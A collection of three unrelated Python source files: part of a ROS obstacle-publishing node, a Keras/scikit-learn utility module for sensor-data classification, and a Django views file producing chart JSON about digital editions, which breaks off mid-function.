  #line_end.y = 2
  #line_end.y = -4
  #obstacle_msg.obstacles[1].polygon.points = [line_start, line_end]
  # Add polygon obstacle
  #obstacle_msg.obstacles.append(PolygonStamped())
  #v1 = Point32()
  #v1.x = -1
  #v1.y = -1
  #v2 = Point32()
  #v2.x = -0.5
  #v2.y = -1.5
  #v3 = Point32()
  #v3.x = 0
  #v3.y = -1
  #obstacle_msg.obstacles[2].polygon.points = [v1, v2, v3]
  r = rospy.Rate(10) # 10hz
  t = 0.0
  while not rospy.is_shutdown():
    # Vary y component of the point obstacle
    if (vel_y >= 0):
      obstacle_msg.obstacles[0].polygon.points[0].y = y_0 + (vel_y*t)%range_y
    else:
      obstacle_msg.obstacles[0].polygon.points[0].y = y_0 + (vel_y*t)%range_y - range_y
    t = t + 0.1
    pub.publish(obstacle_msg)
    r.sleep()
# Entry point: publish until ROS shutdown; the interrupt raised on Ctrl-C /
# node shutdown is expected and silently ignored.
if __name__ == '__main__':
  try:
    publish_obstacle_msg()
  except rospy.ROSInterruptException:
    pass
|
import numpy as np
import pandas as pd
import pickle
import seaborn as sns
import matplotlib.pyplot as plt
from IPython.display import clear_output
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix
from sklearn.utils.multiclass import unique_labels
from sklearn.metrics import f1_score, precision_score, recall_score, roc_auc_score
from sklearn.metrics import average_precision_score
from sklearn.metrics import precision_recall_curve, plot_precision_recall_curve
from sklearn.metrics import classification_report, confusion_matrix
import pprint
import tensorflow as tf
from tensorflow import keras
class PlotLosses(keras.callbacks.Callback):
    """
    Keras callback that live-plots training and validation metrics per epoch.

    Arguments:
        metrics (list[str]): metric names to track; for each name both the
            training value and the 'val_<name>' value are recorded.
    """
    def __init__(self, metrics):
        self.i = 0              # epoch counter
        self.epoch = []         # x-axis values for the plots
        self.metrics_names = metrics
        self.metrics = {}       # name -> list of per-epoch values
        for name in self.metrics_names:
            self.metrics[name] = []
            self.metrics['val_' + name] = []
        self.fig = plt.figure()
        self.logs = []
        # BUG FIX: float(tf.__version__[:3]) truncated e.g. "1.15.0" to 1.1.
        # Parse "major.minor" properly instead.  (Unused in this class; kept
        # because external code may read it.)
        self.tf_version = float(".".join(tf.__version__.split(".")[:2]))

    def on_epoch_end(self, epoch, logs=None):
        """Record this epoch's metrics and redraw the live plot."""
        logs = logs or {}  # avoid the mutable-default-argument pitfall
        self.logs.append(logs)
        self.epoch.append(self.i)
        # Extract the metrics from the logs.
        for name in self.metrics_names:
            tr_value = logs.get(name)
            # Missing validation metrics default to 0.0.  (The original
            # try/except could never fire: dict.get returns None rather
            # than raising.)
            val_value = logs.get('val_' + name, 0.0)
            self.metrics[name].append(tr_value)
            self.metrics['val_' + name].append(val_value)
        self.i += 1
        # One subplot per metric, training and validation curves overlaid.
        f, axes = plt.subplots(len(self.metrics_names), 1, sharex=True,
                               figsize=(12, 4 * len(self.metrics_names)))
        clear_output(wait=True)
        for name, ax in zip(self.metrics_names, axes):
            ax.plot(self.epoch, self.metrics.get(name), label=name)
            ax.plot(self.epoch, self.metrics.get('val_' + name), label="val " + name)
            ax.legend()
        axes[-1].set_xlabel("Epoch")
        plt.show()
def print_confusion_matrix(confusion_matrix, class_names, activities,
                           figsize = (12, 6), fontsize=10):
    """
    Prints a confusion matrix, as returned by sklearn.metrics.confusion_matrix, as a heatmap.

    Arguments
    ---------
    confusion_matrix: numpy.ndarray
        The numpy.ndarray object returned from a call to sklearn.metrics.confusion_matrix.
        Similarly constructed ndarrays can also be used.
    class_names: list
        An ordered list of class names, in the order they index the given confusion matrix.
    activities: list
        Human-readable labels used for the axis tick labels.
    figsize: tuple
        A 2-long tuple, the first value determining the horizontal size of the output figure,
        the second determining the vertical size.
    fontsize: int
        Font size for axes labels.

    Returns
    -------
    matplotlib.figure.Figure
        The resulting confusion matrix figure
    """
    df_cm = pd.DataFrame(
        confusion_matrix, index=class_names, columns=class_names,
    )
    # BUG FIX: figsize was previously ignored; create the target figure with
    # the requested size before drawing on it.
    fig = plt.figure(figsize=figsize)
    try:
        heatmap = sns.heatmap(df_cm, annot=True, fmt="d", cmap='Blues')
    except ValueError:
        raise ValueError("Confusion matrix values must be integers.")
    heatmap.yaxis.set_ticklabels(activities, rotation=0, ha='right', fontsize=fontsize)
    heatmap.xaxis.set_ticklabels(activities, rotation=90, ha='right', fontsize=fontsize)
    plt.show()
    # BUG FIX: the docstring promised the figure, but it was never returned
    # (and 'fig = fig = plt.gcf()' was a garbled double assignment).
    return fig
def get_features_labels_from_df(data_df, shape_y, shape_z):
    """
    Split a dataframe into normalized features and labels.

    The 'Class' column becomes the integer label vector; every remaining
    column is min-max scaled into (-1.0, 1.0), reshaped to
    (n_samples, shape_y, shape_z) and transposed to
    (n_samples, shape_z, shape_y) — i.e. (window length, channels).

    Arguments:
        data_df (pandas.DataFrame): dataframe with a 'Class' column
        shape_y (int): number of sensor channels
        shape_z (int): length of the window segment

    Returns:
        (features, labels, one-hot labels)
    """
    labels = data_df['Class'].values.astype(int)
    raw = data_df.drop(['Class'], axis=1).values
    scaled = MinMaxScaler(feature_range=(-1.0, 1.0)).fit_transform(raw)
    features = np.transpose(scaled.reshape(-1, shape_y, shape_z), (0, 2, 1))
    one_hot = keras.utils.to_categorical(labels, np.max(labels) + 1)
    return features, labels, one_hot
def min_max_scale(data):
    """
    Min-Max scale each flattened feature column into the range [-1.0, 1.0].

    The data is expected to have the shape (n_samples, segment_length, n_channels);
    each of the segment_length * n_channels positions is scaled independently
    over the sample axis (matching sklearn's MinMaxScaler on the flattened
    array, including its "constant column maps to the range minimum" rule).

    Returns the scaled data in the original shape AND element order.
    (BUG FIX: the previous reshape(-1, n_channels, segment_length) followed
    by a transpose reinterpreted the time-major flattening as channel-major,
    permuting the values whenever segment_length != n_channels.)
    """
    n_samples, segment_length, n_channels = data.shape
    # Flatten each sample (row-major -> time-major feature columns).
    flat = data.reshape(n_samples, segment_length * n_channels).astype(float)
    col_min = flat.min(axis=0)
    col_range = flat.max(axis=0) - col_min
    # Constant columns: divide by 1 so they map to the lower bound (-1.0),
    # as sklearn's MinMaxScaler does.
    col_range[col_range == 0.0] = 1.0
    scaled = (flat - col_min) / col_range * 2.0 - 1.0
    # Undo the flattening in the same (time-major) order.
    return scaled.reshape(n_samples, segment_length, n_channels)
def standard_scaler(data):
    """
    Normalize each flattened feature column to zero mean and unit standard
    deviation (population std, ddof=0, matching sklearn's StandardScaler).

    The data is expected to have the shape (n_samples, segment_length, n_channels).
    Returns the scaled data in the original shape AND element order.

    BUG FIXES vs. the original:
      * StandardScaler(with_mean=False, with_std=False) was a no-op,
        contradicting this docstring — the data was returned unscaled.
      * reshape(-1, n_channels, segment_length) + transpose permuted the
        values whenever segment_length != n_channels.
    """
    n_samples, segment_length, n_channels = data.shape
    # Flatten each sample (row-major -> time-major feature columns).
    flat = data.reshape(n_samples, segment_length * n_channels).astype(float)
    mean = flat.mean(axis=0)
    std = flat.std(axis=0)
    # Constant columns: divide by 1 so they map to exactly zero.
    std[std == 0.0] = 1.0
    scaled = (flat - mean) / std
    # Undo the flattening in the same (time-major) order.
    return scaled.reshape(n_samples, segment_length, n_channels)
def get_cnn_model(input_shape, n_output_classes, learning_rate):
    """
    Build and compile a 1D CNN classifier.

    Architecture: Conv1D(100) - Conv1D(50) - GlobalMaxPool1D - Dense(64)
    - Dropout(0.3) - Dense(n_output_classes, softmax), trained with
    categorical cross-entropy and the Adam optimizer.

    Arguments:
        input_shape (tuple): shape of a single input sample
        n_output_classes (int): number of output classes
        learning_rate (float): learning rate for the Adam optimizer

    Returns:
        A compiled keras model ready for training.
    """
    model = keras.Sequential()
    model.add(keras.layers.Conv1D(filters=100, kernel_size=10, strides=2,
                                  activation=tf.nn.relu, input_shape=input_shape))
    model.add(keras.layers.Conv1D(filters=50, kernel_size=5, strides=1,
                                  activation=tf.nn.relu))
    model.add(keras.layers.GlobalMaxPool1D())
    model.add(keras.layers.Dense(units=64, activation=tf.nn.relu))
    model.add(keras.layers.Dropout(rate=0.3))
    model.add(keras.layers.Dense(units=n_output_classes, activation=tf.nn.softmax))
    model.compile(loss=keras.losses.categorical_crossentropy,
                  optimizer=keras.optimizers.Adam(learning_rate=learning_rate),
                  metrics=['accuracy'])
    return model
def save_data(path, data):
    """
    Given a path and data, save the data to the path as a pickle file.

    Arguments:
        path (string) : file path with .pkl extension
        data : data values; can be a single container or multiple containers
    """
    # 'with' guarantees the file handle is closed even if pickling raises
    # (the original open/close pair leaked the handle on error).
    with open(path, "wb") as f:
        pickle.dump(data, f)
def read_data(path, n_vaues=None):
    """
    Given a path, read the pickle file and return the contents.

    Arguments:
        path (string) : File path with .pkl extension
        n_vaues : unused (typo'd name retained so existing keyword callers
            keep working); originally meant to be the number of containers
            expected to be read.
    """
    # 'with' guarantees the file handle is closed even if unpickling raises.
    with open(path, "rb") as f:
        return pickle.load(f)
def stylize_axis(ax, xticks=True, yticks=False, top_right_spines=True,
                 bottom_left_spines=False):
    """
    Strip ticks and spines from a matplotlib axis.

    NOTE: each boolean enables *removal* of the corresponding decoration —
    True means "hide it" (the original docstring said "visible", which was
    the opposite of what the code does).

    Arguments:
        ax (matplotlib.axes.Axes): axis to restyle
        xticks (bool): if True, remove the x tick marks (default True)
        yticks (bool): if True, remove the y tick marks (default False)
        top_right_spines (bool): if True, hide the top and right spines (default True)
        bottom_left_spines (bool): if True, hide the bottom and left spines (default False)
    """
    if xticks:
        ax.set_xticks([])
    if yticks:
        ax.set_yticks([])
    if top_right_spines:
        ax.spines['right'].set_visible(False)
        ax.spines['top'].set_visible(False)
    if bottom_left_spines:
        ax.spines['left'].set_visible(False)
        ax.spines['bottom'].set_visible(False)
def print_metrics(met_dict):
    """
    Pretty-print a metrics dictionary (Loss, Accuracy, Precision, Recall,
    F1 Score, ROC AUC), one value per line with three decimal places.
    """
    rows = [
        ("Loss: {:.3f}", met_dict['Loss']),
        ("Accuracy: {:.3f} %", met_dict['Accuracy'] * 100),
        ("Precision score: {:.3f}", met_dict['Precision']),
        ("Recall score: {:.3f}", met_dict["Recall"]),
        ("F1 score: {:.3f}", met_dict['F1 Score']),
        ("ROC AUC: {:.3f}", met_dict['ROC AUC']),
    ]
    for template, value in rows:
        print(template.format(value))
def precision_recall_f1_score(y_true, y_pred):
    """ Compute precision, recall, and f1 score given y and y predicted.
    y_true and y_pred are labels (not hot encoded).
    Uses 'binary' averaging for two-class problems, 'macro' otherwise.
    Return a dictionary containing Precision, Recall, and F1 Score.
    """
    # pick the sklearn averaging mode from the number of distinct labels
    average_case = 'binary' if len(np.unique(y_true)) == 2 else 'macro'
    precision = precision_score(y_true, y_pred, average=average_case)
    recall = recall_score(y_true, y_pred, average=average_case)
    print(f"Precision {precision} \nRecall {recall}")
    f1_score_cal = f1_score(y_true, y_pred, average=average_case)
    # cross-check the library value against the harmonic-mean formula
    print("F1 score {:.3f}, with formula {:.3f}".format(
        f1_score_cal, 2 * ((precision * recall) / (precision + recall))))
    return {'Precision': precision, 'Recall': recall, 'F1 Score': f1_score_cal}
def compute_performance_metrics(model, x, y, metric_names):
    """
    Evaluate a binary classifier on (x, y), print its metrics, and return
    them as a dictionary.

    Prints accuracy, loss, the confusion-matrix cells (TP/FP/TN/FN),
    recall, precision, F1 score, average precision, ROC AUC, and a full
    classification report.

    Arguments:
        model: TensorFlow model
        x: feature vectors
        y: label vector (one hot encoded)
        metric_names: names matching the values model.evaluate returns
    Returns:
        A dictionary containing Accuracy, Loss, True Positive, False
        Positive, True Negative, False Negative, Recall, Precision,
        F1 Score, and ROC AUC (fixes the 'containint' docstring typo);
        an empty dict for non-binary problems.
    """
    y_true = np.argmax(y, axis=1)
    if len(np.unique(y_true)) > 2:
        print("This only works for binary classification")
        return {}
    # get the metrics
    metrics = model.evaluate(x, y)
    # name -> value mapping of whatever model.evaluate reported
    # (informational only; the returned dict below is built by hand)
    rt = dict(zip(metric_names, metrics))
    # the loss is always at first position and accuracy the second
    loss, acc = metrics[0], metrics[1] * 100
    print("Accuracy {:.3f}, Loss {:.3f}".format(acc, loss))
    y_probs = model.predict(x)
    y_pred = np.argmax(y_probs, axis=1)
    tp, fp, tn, fn = (0, 0, 0, 0)
    try:
        # ravel() unpacks into exactly 4 cells only for a 2x2 matrix.
        # The original bare 'except:' swallowed every error (even
        # KeyboardInterrupt); only the unpack failure is expected here.
        tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
    except ValueError:
        print("Not a binary classification problem")
    print("True Positive ", tp)
    print("False Positive ", fp)
    print("True Negative ", tn)
    print("False Negative ", fn)
    recall = recall_score(y_true, y_pred)
    precision = precision_score(y_true, y_pred)
    # cross-check the library values against the textbook formulas
    print("Recall {:.3f}, with formula {:.3f}".format(recall, (tp / (tp + fn))))
    print("Precision {:.3f}, with formula {:.3f}".format(precision, (tp / (tp + fp))))
    f1_score_cal = f1_score(y_true, y_pred)
    print("F1 score {:.3f}, with formula {:.3f}".format(
        f1_score_cal, 2 * ((precision * recall) / (precision + recall))))
    print("Average precision score {:.3f}".format(average_precision_score(y_true, y_pred)))
    roc_auc = roc_auc_score(y_true, y_pred)
    print("ROC AUC Score {:.3f}".format(roc_auc))
    clf_report = classification_report(y_true, y_pred, output_dict=True)
    pprint.pprint(clf_report)
    return {
        'Accuracy': acc,
        'Loss': loss,
        'True Positive': tp,
        'False Positive': fp,
        'True Negative': tn,
        'False Negative': fn,
        'Recall': recall,
        'Precision': precision,
        'F1 Score': f1_score_cal,
        'ROC AUC': roc_auc,
    }
def split_into_train_test(X, Y, test_split=0.25):
    """
    Split (X, Y) into stratified, shuffled training and test sets.

    Arguments:
        X (numpy.ndarray): Data vector
        Y (numpy.ndarray): Label vector
        test_split (float): Test split (0.25 by default)
    Returns:
        x_train, x_test, y_train, y_test
    """
    if len(X) != len(Y):
        raise ValueError("X and Y must be the same length")
    # fixed seed keeps the split reproducible across runs
    x_train, x_test, y_train, y_test = train_test_split(
        X, Y, test_size=test_split, random_state=42,
        shuffle=True, stratify=Y)
    print("Training set {} \nTest set {}".format(x_train.shape, x_test.shape))
    return x_train, x_test, y_train, y_test
def select_random_samples(data, n_samples):
    """
    @brief: Select n_samples distinct random samples from the data.
    @param: data (numpy.ndarray) Source array; sampled along axis 0.
    @param: n_samples (int) Number of samples to randomly select from the data.
    @return: The full array when n_samples >= len(data); otherwise
             n_samples rows drawn without replacement.
    """
    length = data.shape[0]
    if n_samples >= length:
        return data
    # np.random.randint sampled WITH replacement, so the "random samples"
    # could contain duplicate rows; choice(..., replace=False) guarantees
    # n_samples distinct rows. (Also drops a leftover debug print.)
    random_index = np.random.choice(length, size=n_samples, replace=False)
    return data[random_index]
def get_hot_labels(Y):
    """
    One-hot encode a label vector.

    Arguments:
        Y (numpy.ndarray): integer label vector
    Returns:
        One hot encoded label matrix with np.max(Y) + 1 columns.
    """
    num_classes = np.max(Y) + 1
    return keras.utils.to_categorical(Y, num_classes, dtype=int)
def find_min_max(X):
    """Return the minimum and maximum value of X as a (min, max) tuple."""
    lo, hi = np.min(X), np.max(X)
    return lo, hi
def load_data_with_preprocessing(data_path):
    """
    Load a pickled (X, Y) pair and scale X into the range [-1.0, 1.0].

    Arguments:
        data_path (string): Pickle file path holding an (X, Y) tuple
    Returns:
        (X, Y) with X min-max scaled, or None when the file cannot be
        unpickled into a pair (preserves the original best-effort contract).
    Raises:
        ValueError: when X and Y have different lengths.
    """
    # 'with' closes the handle on every path; the bare 'except:' is
    # narrowed so real programming errors are no longer hidden.
    try:
        with open(data_path, "rb") as f:
            x, y = pickle.load(f)
    except (pickle.UnpicklingError, EOFError, ValueError, TypeError):
        return
    # check for same length
    if len(x) != len(y):
        raise ValueError("Unequal X and Y sizes")
    print("Before Scaling: Min - Max {}".format(find_min_max(x)))
    scaler = MinMaxScaler((-1.0, 1.0))
    x = scaler.fit_transform(x)
    print("After Scaling: Min - Max {}".format(find_min_max(x)))
    return x, y
def cross_validation(model_function, X, Y, n_CV, test_split, val_split, batch_size=32, epochs=50):
    """
    @brief: Train n_CV fresh models on a fixed train/test split and collect
            the per-run metrics.
    @param: model_function : A function that returns the model after calling it.
    @param: X (array): Total data
    @param: Y (array): Total label
    @param: n_CV (int): Number of repetitions
    @param: test_split (float): The percentage of samples to be included in the test set
    @param: val_split (float): The percentage of samples to be included in the validation set.
    @param: batch_size (int): Default 32
    @param: epochs (int): Default 50
    @return: Results of the cross validation, a dictionary keyed by run index
    """
    # Fixes vs. original: split_into_train_test takes (X, Y, test_split) and
    # returns 4 values (there was no val_split kwarg / 6-tuple to unpack);
    # evaluate_model's keyword is val_split (not validation_split) and it
    # returns a (train_metrics, test_metrics) pair; compute_performance_metrics
    # requires metric_names and one-hot labels, and returns a dict (it was
    # being indexed like a tuple).
    x_tr, x_ts, y_tr, y_ts = split_into_train_test(X, Y, test_split)
    y_tr_hot = get_hot_labels(y_tr)
    y_ts_hot = get_hot_labels(y_ts)
    metric_names = ['loss', 'accuracy']
    results_dict = {}
    metrics_arr = []
    for i in range(n_CV):
        model = model_function()
        train_metrics, test_metrics = evaluate_model(
            model, x_tr, y_tr_hot, x_ts, y_ts_hot, val_split=val_split,
            batch_size=batch_size, epochs=epochs)
        # loss first, accuracy second (Keras evaluate convention)
        metrics_arr.append([train_metrics[0], train_metrics[1],
                            test_metrics[0], test_metrics[1]])
        train_report = compute_performance_metrics(model, x_tr, y_tr_hot, metric_names)
        test_report = compute_performance_metrics(model, x_ts, y_ts_hot, metric_names)
        run = {"Training Loss": train_metrics[0], "Training Accuracy": train_metrics[1],
               "Test Loss": test_metrics[0], "Test Accuracy": test_metrics[1]}
        for key, value in train_report.items():
            run["Training " + key] = value
        for key, value in test_report.items():
            run["Test " + key] = value
        results_dict[i] = run
    metrics_arr = np.array(metrics_arr).reshape(n_CV, 4)
    print("Average Training Set Accuracy {:.3f}".format(np.average(metrics_arr[:, 1].ravel())))
    print("Average Testing Set Accuracy {:.3f}".format(np.average(metrics_arr[:, 3].ravel())))
    return results_dict
def evaluate_model(model, x_tr, y_tr, x_ts, y_ts, val_split=0.0,
                   batch_size=32, epochs=50, callbacks=None,
                   metric_names=None):
    """
    @brief: Train the model, plot its losses, and evaluate it on the
            training and test sets.
    @param: model: TF model
    @param: x_tr: training x
    @param: y_tr: training y
    @param: x_ts: test x
    @param: y_ts: test y
    @param: val_split: validation set split passed to model.fit
    @param: batch_size (int): default value 32
    @param: epochs (int): default value 50
    @param: callbacks: extra TF callback functions (None for none).
            The mutable list defaults were replaced with None — a shared
            [] default is a classic Python pitfall.
    @param: metric_names: metric labels for the loss plot
            (defaults to ['accuracy', 'loss'])
    @return: (train_metrics, test_metrics) as returned by model.evaluate
    """
    if callbacks is None:
        callbacks = []
    if metric_names is None:
        metric_names = ['accuracy', 'loss']
    # live loss plot during training
    plot_loss_cb = PlotLosses(metric_names)
    cbs = [plot_loss_cb] + list(callbacks)
    # fit quietly; the PlotLosses callback reports progress
    model_history = model.fit(x_tr, y_tr, batch_size=batch_size, epochs=epochs,
                              validation_split=val_split, verbose=0, callbacks=cbs)
    # get the performance values
    train_metrics = model.evaluate(x_tr, y_tr)
    test_metrics = model.evaluate(x_ts, y_ts)
    return train_metrics, test_metrics
def segment_sensor_reading(values, window_duration, overlap_percentage,
                           sampling_frequency):
    """
    Sliding-window segmentation of a 1D signal.

    param values: 1D array of values to be segmented
    param window_duration: Window duration in seconds
    param overlap_percentage: Float value in the range (0 < overlap_percentage < 1);
        the window start advances by window_length * overlap_percentage
        between consecutive segments
    param sampling_frequency: Frequency in Hz
    return: 2D array of shape (n_segments, window_length), or an empty
        list when the signal is shorter than one window
    """
    total_length = len(values)
    window_length = sampling_frequency * window_duration
    if total_length < window_length:
        return []
    step = int(window_length * overlap_percentage)
    segments = []
    start, end = 0, window_length
    while True:
        # take the current window, then slide forward by 'step'
        segments.append(values[start:end])
        start += step
        end += step
        if start > total_length or end > total_length:
            break
    return np.array(segments).reshape(len(segments), window_length)
def create_tf_dataset(X, Y, batch_size, test_size=0.3):
    """ Create train and test TF dataset from X and Y
    The prefetch overlays the preprocessing and model execution of a training step.
    While the model is executing training step s, the input pipeline is reading the data for step s+1.
    AUTOTUNE automatically tune the number for sample which are prefeteched automatically.
    Keyword arguments:
    X -- numpy array
    Y -- numpy array
    batch_size -- integer
    test_size -- float test fraction (was silently ignored before:
                 0.3 was hard-coded in the split call)
    """
    AUTOTUNE = tf.data.experimental.AUTOTUNE
    X = X.astype('float32')
    Y = Y.astype('float32')
    # use the test_size parameter instead of the hard-coded 0.3
    x_tr, x_ts, y_tr, y_ts = train_test_split(
        X, Y, test_size=test_size, random_state=42, stratify=Y, shuffle=True)
    print(f"Train size: {x_tr.shape[0]}")
    print(f"Test size: {x_ts.shape[0]}")
    train_dataset = tf.data.Dataset.from_tensor_slices((x_tr, y_tr))
    train_dataset = train_dataset.shuffle(buffer_size=1000, reshuffle_each_iteration=True)
    train_dataset = train_dataset.batch(batch_size).prefetch(AUTOTUNE)
    test_dataset = tf.data.Dataset.from_tensor_slices((x_ts, y_ts))
    test_dataset = test_dataset.batch(batch_size).prefetch(AUTOTUNE)
    return train_dataset, test_dataset
def check_continuity(array):
    """
    Check whether the array contains exactly the consecutive run of
    integers min(array)..max(array), in any order, e.g. [1, 2, 3, 4].

    Returns True for an empty array (vacuously continuous; the old code
    raised ValueError on empty input).
    """
    if len(array) == 0:
        return True
    min_v = min(array)
    max_v = max(array)
    # The old 'max - min + 1 == n' heuristic wrongly accepted arrays with
    # duplicates plus gaps, e.g. [1, 1, 3]; compare against the actual run.
    return sorted(array) == list(range(min_v, max_v + 1))
if __name__ == "__main__":
    print("Script with utilities functions used throughout the research projects.")
    # fixed user-facing typo: "Availabel" -> "Available"
    print("Available Functions are:")
    # Print each public helper's docstring as a quick reference, in the
    # same order as the original print statements.
    for helper in (get_cnn_model, get_features_labels_from_df,
                   print_confusion_matrix, PlotLosses, save_data, read_data,
                   stylize_axis, print_metrics, compute_performance_metrics,
                   split_into_train_test, get_hot_labels, find_min_max,
                   load_data_with_preprocessing, evaluate_model,
                   cross_validation, segment_sensor_reading, create_tf_dataset):
        print(helper.__doc__)
|
from django.shortcuts import render
from django.views.generic import TemplateView
from django.views.generic.list import ListView
from django.http import JsonResponse
from django.db.models import Count
from .models import ChartConfig
from editions.models import Edition, Period
from browsing.filters import EditionListFilter
from browsing.forms import GenericFilterFormHelper
from browsing.views import GenericListView
from browsing.views import EditionTable
from collections import Counter
from .chart_config import EDITION_CHART_CONF
class ChartSelector(ListView):
    """List all ChartConfig entries so a user can pick which chart to render."""
    model = ChartConfig
    template_name = 'charts/select_chart.html'
class DynChartView(GenericListView):
    """Render a dynamic chart for one Edition property.

    URL kwargs:
        property: field_path of the ChartConfig describing the chart
        charttype: chart type, passed through to the template
    """
    model = Edition
    table_class = EditionTable
    filter_class = EditionListFilter
    formhelper_class = GenericFilterFormHelper
    template_name = 'charts/dynchart.html'

    def get_context_data(self, **kwargs):
        context = super(DynChartView, self).get_context_data()
        property_name = self.kwargs['property']
        context['property_name'] = property_name
        try:
            chart = ChartConfig.objects.get(
                field_path=self.kwargs['property']
            )
        except (ChartConfig.DoesNotExist, ChartConfig.MultipleObjectsReturned):
            # The original bare 'except:' also hid programming errors;
            # only the two ORM lookup failures are expected here.
            context['error'] = True
            return context
        context[self.context_filter_name] = self.filter
        context['charttype'] = self.kwargs['charttype']
        modelname = self.model.__name__
        payload = []
        objects = self.get_queryset()
        # aggregate the filtered queryset by the chosen property
        for x in objects.values(property_name).annotate(
                amount=Count(property_name)).order_by('amount'):
            if x[property_name]:
                payload.append(["{}".format(x[property_name]), x['amount']])
            else:
                payload.append(['None', x['amount']])
        context['all'] = self.model.objects.count()
        if chart.legend_x:
            legendx = chart.legend_x
        else:
            legendx = "# of {}s".format(modelname)
        data = {
            "items": "{} out of {}".format(objects.count(), context['all']),
            "title": "{}".format(chart.label),
            "subtitle": "{}".format(chart.help_text),
            "legendy": chart.legend_y,
            "legendx": legendx,
            "categories": "sorted(dates)",
            "measuredObject": "{}s".format(modelname),
            "ymin": 0,
            "payload": payload
        }
        context['data'] = data
        return context
# Static demo payload served by the test_json endpoint; mirrors the JSON
# shape the real chart views produce (title, legends, payload rows).
DATA = {"status": "ok",
        "query": "api:graph",
        "timestamp": "2016-07-21T09:56:36.803Z",
        "items": "7",
        "title": "LASK4EVER",
        "subtitle": "This is just a test to check if everythin works as expected.",
        "legendx": "Club",
        "legendy": "# of Victories",
        "measuredObject": "Victories",
        "ymin": -10,
        "payload": [
            ["Club", "# of Victories"],
            ["LASK", 10],
            ["Real Madrid", 4],
            ["Rapid Wien", 0],
            ["<NAME>", -10]
        ]
        }
# Static demo payload served by the test_json_pie endpoint (pie charts
# carry no axis legends, only labelled slices).
DATA_PIECHART = {
    "items": "2",
    "title": "LASK4EVER",
    "subtitle": "This is just a test.",
    "measuredObject": "# of Victories",
    "payload": [
        ["LASK", 9], ["<NAME>", 1]
    ]
}
def barcharts_view(request):
    """Render the static bar-charts demo page."""
    return render(request, 'charts/bar_charts.html', {"test": "test"})
def piecharts_view(request):
    """Render the static pie-charts demo page."""
    return render(request, 'charts/pie_charts.html', {"test": "test"})
def xmltei_json(request):
    """Return JSON chart data: how many editions use XML and TEI."""
    # Human-readable legends for the raw tei_transcription values.
    CHOICES_TEI = {
        "N/A": "N/A",
        "no information provided": "no information provided",
        "not provided": "not provided",
        "not catalogued yet": "not catalogued yet",
        "0": "XML not used",
        "0.5": "XML but not TEI",
        "1": "XML-TEI is used"
    }
    editions = Edition.objects.values(
        'tei_transcription').annotate(total=Count('tei_transcription')).order_by('-total')
    payload = []
    for x in editions:
        if x["tei_transcription"] is not None:
            # .get with the raw value as fallback: an unmapped DB value
            # used to raise KeyError and break the whole endpoint.
            legend = CHOICES_TEI.get(x["tei_transcription"], x["tei_transcription"])
            payload.append([legend, x['total']])
    data = {
        "items": len(Edition.objects.all()),
        "title": "Usage of XML and TEI",
        "subtitle": "The source text is encoded in XML-TEI.",
        "legendx": "Encoding",
        "legendy": "# of Editions",
        "measuredObject": "Editions",
        "ymin": 0,
        "payload": payload
    }
    return JsonResponse(data)
def editions_per_country_json(request):
    """Return JSON chart data counting editions per producing country."""
    editions = Edition.objects.all()
    # One country name per (edition, institution) pair with a known place.
    # NOTE(review): assumes place.part_of is always set when place is —
    # a place without a parent country would raise AttributeError; confirm.
    country_names = [
        inst.place.part_of.name
        for edition in editions
        for inst in edition.institution.all()
        if inst.place is not None
    ]
    payload = [[name, total] for name, total in Counter(country_names).items()]
    data = {
        "items": len(editions),
        "title": "Editions per country",
        "subtitle": "Geographical distribution of editions based on producing institutions.",
        "legendx": "Countries",
        "legendy": "# of Editions",
        "measuredObject": "Editions",
        "ymin": 0,
        "payload": payload
    }
    return JsonResponse(data)
def facs_json(request):
    """Return JSON chart data: do editions contain digital facsimiles?"""
    editions = Edition.objects.values(
        'images').annotate(total=Count('images')).order_by('-total')
    # one [legend, count] row per non-null images value
    payload = [[row["images"], row["total"]]
               for row in editions if row["images"] is not None]
    data = {
        "items": len(Edition.objects.all()),
        "title": "Images available?",
        "subtitle": "Do editions contain digital images of the primary source(s)?",
        "legendx": "images?",
        "legendy": "# of Editions",
        "measuredObject": "Editions",
        "ymin": 0,
        "payload": payload
    }
    return JsonResponse(data)
def xmldownload_json(request):
    """Return JSON chart data: is the XML-TEI text available for download?"""
    CHOICES_DOWNLOAD = (
        ("", "----"),
        ("no information provided", "no information provided"),
        ("not catalogued yet", "not catalogued yet"),
        ("0", "no"),
        ("0.5", "partially"),
        ("1", "yes"),
        ("N/A", "N/A")
    )
    # Build the lookup once — the original rebuilt dict(CHOICES_DOWNLOAD)
    # on every loop iteration — and use .get so an unmapped DB value no
    # longer raises KeyError and breaks the endpoint.
    legend_by_value = dict(CHOICES_DOWNLOAD)
    editions = Edition.objects.values(
        'download').annotate(total=Count('download')).order_by('-total')
    payload = []
    for x in editions:
        if x["download"] is not None:
            legend = legend_by_value.get(x["download"], x["download"])
            payload.append([legend, x['total']])
    data = {
        "items": len(Edition.objects.all()),
        "title": "Access to the Data",
        "subtitle": "The XML-TEI encoded text is available for download.",
        "legendx": "download possible",
        "legendy": "# of Editions",
        "measuredObject": "Editions",
        "ymin": 0,
        "payload": payload
    }
    return JsonResponse(data)
def indices_json(request):
    """Return JSON chart data: is the edition's content accessible via indices?"""
    editions = Edition.objects.values(
        'indices').annotate(total=Count('indices')).order_by('-total')
    # one [legend, count] row per non-null indices value
    payload = [[row["indices"], row["total"]]
               for row in editions if row["indices"] is not None]
    data = {
        "items": len(Edition.objects.all()),
        "title": "Indices provided",
        "subtitle": "Is the edition's content accessable by indices?",
        "legendx": "indices",
        "legendy": "# of Editions",
        "measuredObject": "Editions",
        "ymin": 0,
        "payload": payload
    }
    return JsonResponse(data)
def cc_json(request):
    """Return JSON chart data: is the edition published under a CC license?"""
    editions = Edition.objects.values(
        'cc_license').annotate(total=Count('cc_license')).order_by('-total')
    # one [legend, count] row per non-null cc_license value
    payload = [[row["cc_license"], row["total"]]
               for row in editions if row["cc_license"] is not None]
    data = {
        "items": len(Edition.objects.all()),
        "title": "Creative Commons License",
        "subtitle": "Is the work published using a Creative Commons License",
        "legendx": "cc-license",
        "legendy": "# of Editions",
        "measuredObject": "Editions",
        "ymin": 0,
        "payload": payload
    }
    return JsonResponse(data)
def advanced_search_json(request):
    """Return JSON chart data: does the edition offer advanced search?"""
    editions = Edition.objects.values(
        'advanced_search').annotate(total=Count('advanced_search')).order_by('-total')
    # one [legend, count] row per non-null advanced_search value
    payload = [[row["advanced_search"], row["total"]]
               for row in editions if row["advanced_search"] is not None]
